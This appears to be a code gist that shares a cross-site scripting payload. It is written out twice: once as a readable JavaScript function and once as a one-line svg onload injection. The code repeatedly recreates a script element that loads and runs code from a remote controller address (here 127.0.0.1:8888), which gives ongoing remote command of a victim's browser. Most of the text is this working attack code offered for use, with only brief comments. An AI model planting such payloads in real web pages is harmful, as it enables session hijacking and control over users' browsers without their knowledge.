nuryslyrt · February 26, 2018 20:55
diff --git a/remote-XSS-javascript-part.js b/remote-XSS-javascript-part.js
 // clean JavaScript payload
 // I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression)
 (function(){
    var d=document,s;             // create first <script> element
    s=d.createElement('script');  // and append it to body
    d.body.appendChild(s);
    setInterval(function(){
        d.body.removeChild(s);    // remove, then create again and get connection
        s=d.createElement('script');
        d.body.appendChild(s);
        s.src="//127.0.0.1:8888";
        d.body.appendChild(s);
       },0);
    }
 )()
diff --git a/XSS-payload.html b/XSS-payload.html
 <svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
 setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
 s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>
	// clean JavaScript payload
	// I'm using IIFE to run this via onload event handler (Immediately Invoked Function Expression)
	(function(){
	var d=document,s; // create first <script> element
	s=d.createElement('script'); // and append it to body
	d.body.appendChild(s);
	setInterval(function(){
	d.body.removeChild(s); // remove, then create again and get connection
	s=d.createElement('script');
	d.body.appendChild(s);
	s.src="//127.0.0.1:8888";
	d.body.appendChild(s);
	},0);
	}
	)()
	<svg/onload=(function(){d=document;s=d.createElement('script');d.body.appendChild(s);
	setInterval(function(){d.body.removeChild(s);s=d.createElement('script');d.body.appendChild(s);
	s.src="//127.0.0.1:8888";d.body.appendChild(s);},0);})()>